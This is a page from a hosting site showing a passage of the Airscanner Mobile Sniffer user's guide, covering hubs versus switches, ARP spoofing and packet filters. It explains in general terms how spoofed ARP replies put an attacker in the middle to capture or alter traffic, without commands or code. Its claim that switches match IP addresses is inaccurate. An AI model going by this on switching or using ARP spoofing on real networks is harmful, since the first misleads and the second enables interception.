Manualshelf

User`s guide

ManualsBrandsAirscanner ManualsComputer equipmentMobile Sniffer
12345678910
(C) 2003 Airscanner Corp. http://www.airscanner.com
A switch, on the other hand, is an active device. It records the MAC addresses of each
network card to which it is connected and creates an internal table of MAC to IP address rules to
help control traffic flow. In other words, a switch will examine each packet header for a
matching IP address. Once a match is found, the switch will pass the data to the port with the
corresponding MAC address. Note, it will pass data only to the port which matches the IP/MAC
table, which means any sniffer connected to another port on the sniffer will NOT have access to
that data; at least, not without some network manipulation.
In the case of a wireless network, you could be dealing with several networking
environments. This is because the wireless part of the network is similar to a hub due to the fact
that data is sent out over the airwaves and there is no method to control who or what has access
to it.
2.3 ARP Spoofing
As we have previously discussed, the existence of a switch in a network is a serious obstacle
to a sniffer. Due to a MAC/IP table, traffic from one NIC will only be passed to the NIC to
which it is addressed. However, it is possible to manipulate the network to successfully gain
access to traffic passing on other ports. This is accomplished using a method known as ARP
spoofing.
The Address Resolution Protocol (ARP) is used by network devices to establish a
relationship between MAC addresses and IP addresses. This is to reduce the complexity of
maintaining a network by providing an easier method of addressing that can be automated and
more easily used. To speed up the process of this conversion, many network devices create an
ARP table that temporarily stores recently received IP addresses and their corresponding MAC
addresses. If an ARP entry is made between two devices, any further data transmissions do not
need to perform another ARP request to determine the MAC address of the target device.
While the use of an ARP table speeds up the data transmission process, it also creates a huge
hole that can be exploited by a sniffer. In short, an ARP table can be manipulated by sending
spoofed ARP Replys to communicating network devices. In this network trick, the hacker will
basically places his or her computer in the middle of an existing data path by creating false ARP
entries in both the target’s computer and the gateway device (or what ever computer with which
the target is communicating). Once the hacker establishes himself in the middle, he can easily
capture, record, or even change the data passing between two network devices.
2.4 Filters
A good sniffer is more than just a packet collection device or program. At its fundamental
layer, a sniffer simply gathers data and stores it in a file, which can grow to be several gigs in
size in only a few minutes, or hours on a slower network. While this data is exactly what a
troubleshooter wants, it can quickly become overwhelming and can in effect swamp the user
with too much irrelevant information. In other words, finding that one desired piece of
information can be much like finding a needle in a haystack.